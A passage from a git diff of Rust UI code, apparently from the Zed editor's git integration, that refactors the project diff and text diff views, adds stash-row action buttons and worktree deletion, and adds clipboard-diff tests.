range.end) { selection = false; - if let Some((excerpt_id, _, range)) = self - .editor - .read(cx) - .rhs_editor() - .read(cx) - .active_excerpt(cx) + let anchor = editor.selections.newest_anchor().head(); + if let Some((_, excerpt_range)) = snapshot.excerpt_containing(anchor..anchor) + && let Some(range) = snapshot + .anchor_in_buffer(excerpt_range.context.start) + .zip(snapshot.anchor_in_buffer(excerpt_range.context.end)) + .map(|(start, end)| start..end) { - ranges = vec![multi_buffer::Anchor::range_in_buffer(excerpt_id, range)]; + ranges = vec![range]; } else { ranges = Vec::default(); - } + }; } let mut has_staged_hunks = false; let mut has_unstaged_hunks = false; @@ -744,7 +715,7 @@ impl ProjectDiff { let (was_empty, is_excerpt_newly_added) = self.editor.update(cx, |editor, cx| { let was_empty = editor.rhs_editor().read(cx).buffer().read(cx).is_empty(); - let (_, is_newly_added) = editor.set_excerpts_for_path( + let is_newly_added = editor.update_excerpts_for_path( path_key.clone(), buffer, excerpt_ranges, @@ -764,7 +735,7 @@ impl ProjectDiff { cx, |selections| { selections.select_ranges([ - multi_buffer::Anchor::min()..multi_buffer::Anchor::min() + multi_buffer::Anchor::Min..multi_buffer::Anchor::Min ]) }, ); @@ -814,8 +785,9 @@ impl ProjectDiff { let mut previous_paths = this .multibuffer .read(cx) - .paths() - .cloned() + .snapshot(cx) + .buffers_with_paths() + .map(|(_, path_key)| path_key.clone()) .collect::>(); if let Some(repo) = repo { @@ -906,10 +878,23 @@ impl ProjectDiff { #[cfg(any(test, feature = "test-support"))] pub fn excerpt_paths(&self, cx: &App) -> Vec> { - self.multibuffer + let snapshot = self + .editor() + .read(cx) + .rhs_editor() + .read(cx) + .buffer() .read(cx) - .paths() - .map(|key| key.path.clone()) + .snapshot(cx); + snapshot + .excerpts() + .map(|excerpt| { + snapshot + .path_for_buffer(excerpt.context.start.buffer_id) + .unwrap() + .path + .clone() + }) .collect() } } @@ -1217,8 +1202,9 @@ impl SerializableItem for ProjectDiff { window: &mut Window, cx: &mut App, ) -> Task>> { + let db = persistence::ProjectDiffDb::global(cx); window.spawn(cx, async move |cx| { - let diff_base = persistence::PROJECT_DIFF_DB.get_diff_base(item_id, workspace_id)?; + let diff_base = db.get_diff_base(item_id, workspace_id)?; let diff = cx.update(|window, cx| { let branch_diff = cx @@ -1244,10 +1230,10 @@ impl SerializableItem for ProjectDiff { let workspace_id = workspace.database_id()?; let diff_base = self.diff_base(cx).clone(); + let db = persistence::ProjectDiffDb::global(cx); Some(cx.background_spawn({ async move { - persistence::PROJECT_DIFF_DB - .save_diff_base(item_id, workspace_id, diff_base.clone()) + db.save_diff_base(item_id, workspace_id, diff_base.clone()) .await } })) @@ -1287,7 +1273,7 @@ mod persistence { )]; } - db::static_connection!(PROJECT_DIFF_DB, ProjectDiffDb, [WorkspaceDb]); + db::static_connection!(ProjectDiffDb, [WorkspaceDb]); impl ProjectDiffDb { pub async fn save_diff_base( @@ -1590,8 +1576,11 @@ fn render_send_review_to_agent_button(review_count: usize, focus_handle: &FocusH "send-review", format!("Send Review to Agent ({})", review_count), ) - .icon(IconName::ZedAssistant) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) .tooltip(Tooltip::for_action_title_in( "Send all review comments to the Agent panel", &SendReviewToAgent, @@ -1684,10 +1673,11 @@ impl Render for BranchDiffToolbar { let focus_handle = focus_handle.clone(); this.child(Divider::vertical()).child( Button::new("review-diff", "Review Diff") - .icon(IconName::ZedAssistant) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) .key_binding(KeyBinding::for_action_in(&ReviewDiff, &focus_handle, cx)) .tooltip(move |_, cx| { Tooltip::with_meta_in( @@ -1715,254 +1705,6 @@ impl Render for BranchDiffToolbar { } } -#[derive(IntoElement, RegisterComponent)] -pub struct ProjectDiffEmptyState { - pub no_repo: bool, - pub can_push_and_pull: bool, - pub focus_handle: Option, - pub current_branch: Option, - // has_pending_commits: bool, - // ahead_of_remote: bool, - // no_git_repository: bool, -} - -impl RenderOnce for ProjectDiffEmptyState { - fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let status_against_remote = |ahead_by: usize, behind_by: usize| -> bool { - matches!(self.current_branch, Some(Branch { - upstream: - Some(Upstream { - tracking: - UpstreamTracking::Tracked(UpstreamTrackingStatus { - ahead, behind, .. - }), - .. - }), - .. - }) if (ahead > 0) == (ahead_by > 0) && (behind > 0) == (behind_by > 0)) - }; - - let change_count = |current_branch: &Branch| -> (usize, usize) { - match current_branch { - Branch { - upstream: - Some(Upstream { - tracking: - UpstreamTracking::Tracked(UpstreamTrackingStatus { - ahead, behind, .. - }), - .. - }), - .. - } => (*ahead as usize, *behind as usize), - _ => (0, 0), - } - }; - - let not_ahead_or_behind = status_against_remote(0, 0); - let ahead_of_remote = status_against_remote(1, 0); - let branch_not_on_remote = if let Some(branch) = self.current_branch.as_ref() { - branch.upstream.is_none() - } else { - false - }; - - let has_branch_container = |branch: &Branch| { - h_flex() - .max_w(px(420.)) - .bg(cx.theme().colors().text.opacity(0.05)) - .border_1() - .border_color(cx.theme().colors().border) - .rounded_sm() - .gap_8() - .px_6() - .py_4() - .map(|this| { - if ahead_of_remote { - let ahead_count = change_count(branch).0; - let ahead_string = format!("{} Commits Ahead", ahead_count); - this.child( - v_flex() - .child(Headline::new(ahead_string).size(HeadlineSize::Small)) - .child( - Label::new(format!("Push your changes to {}", branch.name())) - .color(Color::Muted), - ), - ) - .child(div().child(render_push_button( - self.focus_handle, - "push".into(), - ahead_count as u32, - ))) - } else if branch_not_on_remote { - this.child( - v_flex() - .child(Headline::new("Publish Branch").size(HeadlineSize::Small)) - .child( - Label::new(format!("Create {} on remote", branch.name())) - .color(Color::Muted), - ), - ) - .child( - div().child(render_publish_button(self.focus_handle, "publish".into())), - ) - } else { - this.child(Label::new("Remote status unknown").color(Color::Muted)) - } - }) - }; - - v_flex().size_full().items_center().justify_center().child( - v_flex() - .gap_1() - .when(self.no_repo, |this| { - this.text_center() - .child(Label::new("No Repository").color(Color::Muted)) - .child( - Button::new("initialize-repo", "Initialize Repository") - .on_click(move |_, _, cx| cx.dispatch_action(&git::Init)), - ) - }) - .map(|this| { - if not_ahead_or_behind && self.current_branch.is_some() { - this.text_center() - .child(Label::new("No Changes").color(Color::Muted)) - } else { - this.when_some(self.current_branch.as_ref(), |this, branch| { - this.child(has_branch_container(branch)) - }) - } - }), - ) - } -} - -mod preview { - use git::repository::{ - Branch, CommitSummary, Upstream, UpstreamTracking, UpstreamTrackingStatus, - }; - use ui::prelude::*; - - use super::ProjectDiffEmptyState; - - // View this component preview using `workspace: open component-preview` - impl Component for ProjectDiffEmptyState { - fn scope() -> ComponentScope { - ComponentScope::VersionControl - } - - fn preview(_window: &mut Window, _cx: &mut App) -> Option { - let unknown_upstream: Option = None; - let ahead_of_upstream: Option = Some( - UpstreamTrackingStatus { - ahead: 2, - behind: 0, - } - .into(), - ); - - let not_ahead_or_behind_upstream: Option = Some( - UpstreamTrackingStatus { - ahead: 0, - behind: 0, - } - .into(), - ); - - fn branch(upstream: Option) -> Branch { - Branch { - is_head: true, - ref_name: "some-branch".into(), - upstream: upstream.map(|tracking| Upstream { - ref_name: "origin/some-branch".into(), - tracking, - }), - most_recent_commit: Some(CommitSummary { - sha: "abc123".into(), - subject: "Modify stuff".into(), - commit_timestamp: 1710932954, - author_name: "John Doe".into(), - has_parent: true, - }), - } - } - - let no_repo_state = ProjectDiffEmptyState { - no_repo: true, - can_push_and_pull: false, - focus_handle: None, - current_branch: None, - }; - - let no_changes_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(not_ahead_or_behind_upstream)), - }; - - let ahead_of_upstream_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(ahead_of_upstream)), - }; - - let unknown_upstream_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(unknown_upstream)), - }; - - let (width, height) = (px(480.), px(320.)); - - Some( - v_flex() - .gap_6() - .children(vec![ - example_group(vec![ - single_example( - "No Repo", - div() - .w(width) - .h(height) - .child(no_repo_state) - .into_any_element(), - ), - single_example( - "No Changes", - div() - .w(width) - .h(height) - .child(no_changes_state) - .into_any_element(), - ), - single_example( - "Unknown Upstream", - div() - .w(width) - .h(height) - .child(unknown_upstream_state) - .into_any_element(), - ), - single_example( - "Ahead of Remote", - div() - .w(width) - .h(height) - .child(ahead_of_upstream_state) - .into_any_element(), - ), - ]) - .vertical(), - ]) - .into_any_element(), - ) - } - } -} - struct BranchDiffAddon { branch_diff: Entity, } @@ -2018,7 +1760,7 @@ mod tests { settings.editor.diff_view_style = Some(DiffViewStyle::Unified); }); }); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); @@ -2209,7 +1951,7 @@ mod tests { let snapshot = buffer_editor.snapshot(window, cx); let snapshot = &snapshot.buffer_snapshot(); let prev_buffer_hunks = buffer_editor - .diff_hunks_in_ranges(&[editor::Anchor::min()..editor::Anchor::max()], snapshot) + .diff_hunks_in_ranges(&[editor::Anchor::Min..editor::Anchor::Max], snapshot) .collect::>(); buffer_editor.git_restore(&Default::default(), window, cx); prev_buffer_hunks @@ -2222,7 +1964,7 @@ mod tests { let snapshot = buffer_editor.snapshot(window, cx); let snapshot = &snapshot.buffer_snapshot(); buffer_editor - .diff_hunks_in_ranges(&[editor::Anchor::min()..editor::Anchor::max()], snapshot) + .diff_hunks_in_ranges(&[editor::Anchor::Min..editor::Anchor::Max], snapshot) .collect::>() }); assert_eq!(new_buffer_hunks.as_slice(), &[]); @@ -2481,9 +2223,14 @@ mod tests { cx.update(|window, cx| { let editor = diff.read(cx).editor.read(cx).rhs_editor().clone(); - let excerpt_ids = editor.read(cx).buffer().read(cx).excerpt_ids(); - assert_eq!(excerpt_ids.len(), 1); - let excerpt_id = excerpt_ids[0]; + let excerpts = editor + .read(cx) + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .collect::>(); + assert_eq!(excerpts.len(), 1); let buffer = editor .read(cx) .buffer() @@ -2511,7 +2258,6 @@ mod tests { resolve_conflict( editor.downgrade(), - excerpt_id, snapshot.conflicts[0].clone(), vec![ours_range], window, diff --git a/crates/git_ui/src/stash_picker.rs b/crates/git_ui/src/stash_picker.rs index e736dd806a35703991e1fb51e27e3952e5692d99..2d3515e833e4d353c323f533f1f0f39bb1d76561 100644 --- a/crates/git_ui/src/stash_picker.rs +++ b/crates/git_ui/src/stash_picker.rs @@ -468,7 +468,7 @@ impl PickerDelegate for StashListDelegate { ix: usize, selected: bool, _window: &mut Window, - _cx: &mut Context>, + cx: &mut Context>, ) -> Option { let entry_match = &self.matches[ix]; @@ -501,16 +501,66 @@ impl PickerDelegate for StashListDelegate { .size(LabelSize::Small), ); + let view_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("view-stash", ix), IconName::Eye) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("View Stash", &ShowStashItem, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.show_stash_at(ix, window, cx); + })) + }; + + let pop_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("pop-stash", ix), IconName::MaximizeAlt) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Pop Stash", &menu::SecondaryConfirm, &focus_handle, cx) + }) + .on_click(|_, window, cx| { + window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx); + }) + }; + + let drop_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("drop-stash", ix), IconName::Trash) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Drop Stash", &DropStashItem, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.drop_stash_at(ix, window, cx); + })) + }; + Some( ListItem::new(format!("stash-{ix}")) .inset(true) .spacing(ListItemSpacing::Sparse) .toggle_state(selected) - .child(v_flex().w_full().child(stash_label).child(branch_info)) - .tooltip(Tooltip::text(format!( - "stash@{{{}}}", - entry_match.entry.index - ))), + .child( + h_flex() + .w_full() + .gap_2p5() + .child( + Icon::new(IconName::BoxOpen) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child(div().w_full().child(stash_label).child(branch_info)), + ) + .end_slot( + h_flex() + .gap_0p5() + .child(view_button) + .child(pop_button) + .child(drop_button), + ) + .show_end_slot_on_hover(), ) } @@ -519,6 +569,10 @@ impl PickerDelegate for StashListDelegate { } fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { + if self.matches.is_empty() { + return None; + } + let focus_handle = self.focus_handle.clone(); Some( @@ -602,7 +656,7 @@ mod tests { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }) } diff --git a/crates/git_ui/src/text_diff_view.rs b/crates/git_ui/src/text_diff_view.rs index 1419fa049ee2aae1992dac517aad8371800ac532..fe2add8177e2c9ca92eb8d08776d561e1adaba91 100644 --- a/crates/git_ui/src/text_diff_view.rs +++ b/crates/git_ui/src/text_diff_view.rs @@ -2,14 +2,18 @@ use anyhow::Result; use buffer_diff::BufferDiff; -use editor::{Editor, EditorEvent, MultiBuffer, ToPoint, actions::DiffClipboardWithSelectionData}; +use editor::{ + Editor, EditorEvent, EditorSettings, MultiBuffer, SplittableEditor, ToPoint, + actions::DiffClipboardWithSelectionData, +}; use futures::{FutureExt, select_biased}; use gpui::{ AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle, Focusable, IntoElement, Render, Task, Window, }; -use language::{self, Buffer, Point}; +use language::{self, Buffer, OffsetRangeExt, Point}; use project::Project; +use settings::Settings; use std::{ any::{Any, TypeId}, cmp, @@ -22,13 +26,13 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString}; use util::paths::PathExt; use workspace::{ - Item, ItemHandle as _, ItemNavHistory, Workspace, + Item, ItemNavHistory, Workspace, item::{ItemEvent, SaveOptions, TabContentParams}, searchable::SearchableItemHandle, }; pub struct TextDiffView { - diff_editor: Entity, + diff_editor: Entity, title: SharedString, path: Option, buffer_changes_tx: watch::Sender<()>, @@ -47,27 +51,27 @@ impl TextDiffView { let source_editor = diff_data.editor.clone(); let selection_data = source_editor.update(cx, |editor, cx| { - let multibuffer = editor.buffer().read(cx); - let source_buffer = multibuffer.as_singleton()?; - let selections = editor.selections.all::(&editor.display_snapshot(cx)); - let buffer_snapshot = source_buffer.read(cx); - let first_selection = selections.first()?; - let max_point = buffer_snapshot.max_point(); - - if first_selection.is_empty() { + let multibuffer = editor.buffer(); + let multibuffer_snapshot = multibuffer.read(cx).snapshot(cx); + let first_selection = editor.selections.newest_anchor(); + + let (source_buffer, buffer_range) = multibuffer_snapshot + .anchor_range_to_buffer_anchor_range(first_selection.range())?; + let max_point = source_buffer.max_point(); + let buffer_range = buffer_range.to_point(source_buffer); + let source_buffer = multibuffer.read(cx).buffer(source_buffer.remote_id())?; + + if buffer_range.is_empty() { let full_range = Point::new(0, 0)..max_point; return Some((source_buffer, full_range)); } - let start = first_selection.start; - let end = first_selection.end; - let expanded_start = Point::new(start.row, 0); - - let expanded_end = if end.column > 0 { - let next_row = end.row + 1; + let expanded_start = Point::new(buffer_range.start.row, 0); + let expanded_end = if buffer_range.end.column > 0 { + let next_row = buffer_range.end.row + 1; cmp::min(max_point, Point::new(next_row, 0)) } else { - end + buffer_range.end }; Some((source_buffer, expanded_start..expanded_end)) }); @@ -78,11 +82,24 @@ impl TextDiffView { }; source_editor.update(cx, |source_editor, cx| { - source_editor.change_selections(Default::default(), window, cx, |s| { - s.select_ranges(vec![ - expanded_selection_range.start..expanded_selection_range.end, - ]); - }) + let multibuffer = source_editor.buffer(); + let mb_range = { + let mb = multibuffer.read(cx); + let start_anchor = + mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.start, cx); + let end_anchor = + mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.end, cx); + start_anchor.zip(end_anchor).map(|(s, e)| { + let snapshot = mb.snapshot(cx); + s.to_point(&snapshot)..e.to_point(&snapshot) + }) + }; + + if let Some(range) = mb_range { + source_editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![range]); + }); + } }); let source_buffer_snapshot = source_buffer.read(cx).snapshot(); @@ -102,11 +119,11 @@ impl TextDiffView { ); let task = window.spawn(cx, async move |cx| { - let project = workspace.update(cx, |workspace, _| workspace.project().clone())?; - update_diff_buffer(&diff_buffer, &source_buffer, &clipboard_buffer, cx).await?; workspace.update_in(cx, |workspace, window, cx| { + let project = workspace.project().clone(); + let workspace_entity = cx.entity(); let diff_view = cx.new(|cx| { TextDiffView::new( clipboard_buffer, @@ -115,6 +132,7 @@ impl TextDiffView { expanded_selection_range, diff_buffer, project, + workspace_entity, window, cx, ) @@ -139,6 +157,7 @@ impl TextDiffView { source_range: Range, diff_buffer: Entity, project: Entity, + workspace: Entity, window: &mut Window, cx: &mut Context, ) -> Self { @@ -151,21 +170,30 @@ impl TextDiffView { multibuffer }); let diff_editor = cx.new(|cx| { - let mut editor = Editor::for_multibuffer(multibuffer, Some(project), window, cx); - editor.start_temporary_diff_override(); - editor.disable_diagnostics(cx); - editor.set_expand_all_diff_hunks(cx); - editor.set_render_diff_hunk_controls( + let splittable = SplittableEditor::new( + EditorSettings::get_global(cx).diff_view_style, + multibuffer, + project, + workspace, + window, + cx, + ); + splittable.set_render_diff_hunk_controls( Arc::new(|_, _, _, _, _, _, _, _| gpui::Empty.into_any_element()), cx, ); - editor + splittable.rhs_editor().update(cx, |editor, cx| { + editor.start_temporary_diff_override(); + editor.disable_diagnostics(cx); + editor.set_expand_all_diff_hunks(cx); + }); + splittable }); let (buffer_changes_tx, mut buffer_changes_rx) = watch::channel(()); cx.subscribe(&source_buffer, move |this, _, event, _| match event { - language::BufferEvent::Edited + language::BufferEvent::Edited { .. } | language::BufferEvent::LanguageChanged(_) | language::BufferEvent::Reparsed => { this.buffer_changes_tx.send(()).ok(); @@ -329,12 +357,14 @@ impl Item for TextDiffView { &'a self, type_id: TypeId, self_handle: &'a Entity, - _: &'a App, + cx: &'a App, ) -> Option { if type_id == TypeId::of::() { Some(self_handle.clone().into()) - } else if type_id == TypeId::of::() { + } else if type_id == TypeId::of::() { Some(self.diff_editor.clone().into()) + } else if type_id == TypeId::of::() { + Some(self.diff_editor.read(cx).rhs_editor().clone().into()) } else { None } @@ -349,7 +379,7 @@ impl Item for TextDiffView { cx: &App, f: &mut dyn FnMut(gpui::EntityId, &dyn project::ProjectItem), ) { - self.diff_editor.for_each_project_item(cx, f) + self.diff_editor.read(cx).for_each_project_item(cx, f) } fn set_nav_history( @@ -358,7 +388,8 @@ impl Item for TextDiffView { _: &mut Window, cx: &mut Context, ) { - self.diff_editor.update(cx, |editor, _| { + let rhs = self.diff_editor.read(cx).rhs_editor().clone(); + rhs.update(cx, |editor, _| { editor.set_nav_history(Some(nav_history)); }); } @@ -439,11 +470,12 @@ impl Render for TextDiffView { #[cfg(test)] mod tests { use super::*; - use editor::{MultiBufferOffset, test::editor_test_context::assert_state_with_diff}; - use gpui::{TestAppContext, VisualContext}; + use editor::{MultiBufferOffset, PathKey, test::editor_test_context::assert_state_with_diff}; + use gpui::{BorrowAppContext, TestAppContext, VisualContext}; + use language::Point; use project::{FakeFs, Project}; use serde_json::json; - use settings::SettingsStore; + use settings::{DiffViewStyle, SettingsStore}; use unindent::unindent; use util::{path, test::marked_text_ranges}; use workspace::MultiWorkspace; @@ -452,7 +484,12 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + cx.update_global::(|store, cx| { + store.update_user_settings(cx, |settings| { + settings.editor.diff_view_style = Some(DiffViewStyle::Unified); + }); + }); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -643,6 +680,185 @@ mod tests { .await; } + #[gpui::test] + async fn test_diffing_clipboard_from_multibuffer_with_selection(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "a.txt": "alpha\nbeta\ngamma", + "b.txt": "one\ntwo\nthree" + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + + let buffer_a = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/a.txt"), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/b.txt"), cx) + }) + .await + .unwrap(); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + let editor = cx.new_window_entity(|window, cx| { + let multibuffer = cx.new(|cx| { + let mut mb = MultiBuffer::new(language::Capability::ReadWrite); + mb.set_excerpts_for_path( + PathKey::sorted(0), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb.set_excerpts_for_path( + PathKey::sorted(1), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb + }); + + let mut editor = + Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx); + // Select "beta" inside the first excerpt + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(10)]); + }); + editor + }); + + let diff_view = workspace + .update_in(cx, |workspace, window, cx| { + TextDiffView::open( + &DiffClipboardWithSelectionData { + clipboard_text: "REPLACED".to_string(), + editor, + }, + workspace, + window, + cx, + ) + }) + .unwrap() + .await + .unwrap(); + + cx.executor().run_until_parked(); + + diff_view.read_with(cx, |diff_view, _cx| { + assert!( + diff_view.title.contains("Clipboard"), + "diff view should have opened with a clipboard diff title, got: {}", + diff_view.title + ); + }); + } + + #[gpui::test] + async fn test_diffing_clipboard_from_multibuffer_with_empty_selection(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "a.txt": "alpha\nbeta\ngamma", + "b.txt": "one\ntwo\nthree" + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + + let buffer_a = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/a.txt"), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/b.txt"), cx) + }) + .await + .unwrap(); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + let editor = cx.new_window_entity(|window, cx| { + let multibuffer = cx.new(|cx| { + let mut mb = MultiBuffer::new(language::Capability::ReadWrite); + mb.set_excerpts_for_path( + PathKey::sorted(0), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb.set_excerpts_for_path( + PathKey::sorted(1), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb + }); + + let mut editor = + Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx); + // Cursor inside the first excerpt (no selection) + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(6)]); + }); + editor + }); + + let diff_view = workspace + .update_in(cx, |workspace, window, cx| { + TextDiffView::open( + &DiffClipboardWithSelectionData { + clipboard_text: "REPLACED".to_string(), + editor, + }, + workspace, + window, + cx, + ) + }) + .unwrap() + .await + .unwrap(); + + cx.executor().run_until_parked(); + + // Empty selection should diff the full underlying buffer + diff_view.read_with(cx, |diff_view, _cx| { + assert!( + diff_view.title.contains("Clipboard"), + "diff view should have opened with a clipboard diff title, got: {}", + diff_view.title + ); + }); + } + async fn base_test( project_root: &str, file_path: &str, @@ -715,7 +931,9 @@ mod tests { cx.executor().run_until_parked(); assert_state_with_diff( - &diff_view.read_with(cx, |diff_view, _| diff_view.diff_editor.clone()), + &diff_view.read_with(cx, |diff_view, cx| { + diff_view.diff_editor.read(cx).rhs_editor().clone() + }), cx, expected_diff, ); diff --git a/crates/git_ui/src/worktree_picker.rs b/crates/git_ui/src/worktree_picker.rs index f2826a2b543a73c5341653c42bbb5f1540213b2a..1b4497be1f4ea96bd4f0431c97bb538eda9faa57 100644 --- a/crates/git_ui/src/worktree_picker.rs +++ b/crates/git_ui/src/worktree_picker.rs @@ -2,7 +2,7 @@ use anyhow::Context as _; use collections::HashSet; use fuzzy::StringMatchCandidate; -use git::repository::{Worktree as GitWorktree, validate_worktree_directory}; +use git::repository::Worktree as GitWorktree; use gpui::{ Action, App, AsyncWindowContext, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, @@ -18,11 +18,22 @@ use remote::{RemoteConnectionOptions, remote_client::ConnectionIdentifier}; use remote_connection::{RemoteConnectionModal, connect}; use settings::Settings; use std::{path::PathBuf, sync::Arc}; -use ui::{HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, prelude::*}; -use util::ResultExt; -use workspace::{ModalView, MultiWorkspace, Workspace, notifications::DetachAndPromptErr}; +use ui::{HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; +use util::{ResultExt, debug_panic}; +use workspace::{ + ModalView, MultiWorkspace, OpenMode, Workspace, notifications::DetachAndPromptErr, +}; + +use crate::git_panel::show_error_toast; -actions!(git, [WorktreeFromDefault, WorktreeFromDefaultOnWindow]); +actions!( + git, + [ + WorktreeFromDefault, + WorktreeFromDefaultOnWindow, + DeleteWorktree + ] +); pub fn open( workspace: &mut Workspace, @@ -87,9 +98,12 @@ impl WorktreeList { }); cx.spawn_in(window, async move |this, cx| { - let all_worktrees = all_worktrees_request + let all_worktrees: Vec<_> = all_worktrees_request .context("No active repository")? - .await??; + .await?? + .into_iter() + .filter(|worktree| worktree.ref_name.is_some()) // hide worktrees without a branch + .collect(); let default_branch = default_branch_request .context("No active repository")? @@ -103,6 +117,7 @@ impl WorktreeList { this.picker.update(cx, |picker, cx| { picker.delegate.all_worktrees = Some(all_worktrees); picker.delegate.default_branch = default_branch; + picker.delegate.refresh_forbidden_deletion_path(cx); picker.refresh(window, cx); }) })?; @@ -173,7 +188,7 @@ impl WorktreeList { return; } picker.delegate.create_worktree( - entry.worktree.branch(), + entry.worktree.display_name(), replace_current_window, Some(default_branch.into()), window, @@ -181,6 +196,19 @@ impl WorktreeList { ); }) } + + pub fn handle_delete( + &mut self, + _: &DeleteWorktree, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, |picker, cx| { + picker + .delegate + .delete_at(picker.delegate.selected_index, window, cx) + }) + } } impl ModalView for WorktreeList {} impl EventEmitter for WorktreeList {} @@ -203,6 +231,9 @@ impl Render for WorktreeList { .on_action(cx.listener(|this, _: &WorktreeFromDefaultOnWindow, w, cx| { this.handle_new_worktree(true, w, cx) })) + .on_action(cx.listener(|this, _: &DeleteWorktree, window, cx| { + this.handle_delete(&DeleteWorktree, window, cx) + })) .child(self.picker.clone()) .when(!self.embedded, |el| { el.on_mouse_down_out({ @@ -223,6 +254,14 @@ struct WorktreeEntry { is_new: bool, } +impl WorktreeEntry { + fn can_delete(&self, forbidden_deletion_path: Option<&PathBuf>) -> bool { + !self.is_new + && !self.worktree.is_main + && forbidden_deletion_path != Some(&self.worktree.path) + } +} + pub struct WorktreeListDelegate { matches: Vec, all_worktrees: Option>, @@ -233,6 +272,7 @@ pub struct WorktreeListDelegate { modifiers: Modifiers, focus_handle: FocusHandle, default_branch: Option, + forbidden_deletion_path: Option, } impl WorktreeListDelegate { @@ -252,6 +292,7 @@ impl WorktreeListDelegate { modifiers: Default::default(), focus_handle: cx.focus_handle(), default_branch: None, + forbidden_deletion_path: None, } } @@ -275,11 +316,10 @@ impl WorktreeListDelegate { .git .worktree_directory .clone(); - let work_dir = repo.work_directory_abs_path.clone(); - let directory = - validate_worktree_directory(&work_dir, &worktree_directory_setting)?; - let new_worktree_path = directory.join(&branch); - let receiver = repo.create_worktree(branch.clone(), directory, commit); + let new_worktree_path = + repo.path_for_new_linked_worktree(&branch, &worktree_directory_setting)?; + let receiver = + repo.create_worktree(branch.clone(), new_worktree_path.clone(), commit); anyhow::Ok((receiver, new_worktree_path)) })?; receiver.await??; @@ -324,7 +364,7 @@ impl WorktreeListDelegate { workspace .update_in(cx, |workspace, window, cx| { workspace.open_workspace_for_paths( - replace_current_window, + OpenMode::Activate, vec![new_worktree_path], window, cx, @@ -377,10 +417,15 @@ impl WorktreeListDelegate { else { return; }; + let open_mode = if replace_current_window { + OpenMode::Activate + } else { + OpenMode::NewWindow + }; if is_local { let open_task = workspace.update(cx, |workspace, cx| { - workspace.open_workspace_for_paths(replace_current_window, vec![path], window, cx) + workspace.open_workspace_for_paths(open_mode, vec![path], window, cx) }); cx.spawn(async move |_, _| { open_task?.await?; @@ -420,6 +465,81 @@ impl WorktreeListDelegate { .as_ref() .and_then(|repo| repo.read(cx).branch.as_ref().map(|b| b.name())) } + + fn delete_at(&self, idx: usize, window: &mut Window, cx: &mut Context>) { + let Some(entry) = self.matches.get(idx).cloned() 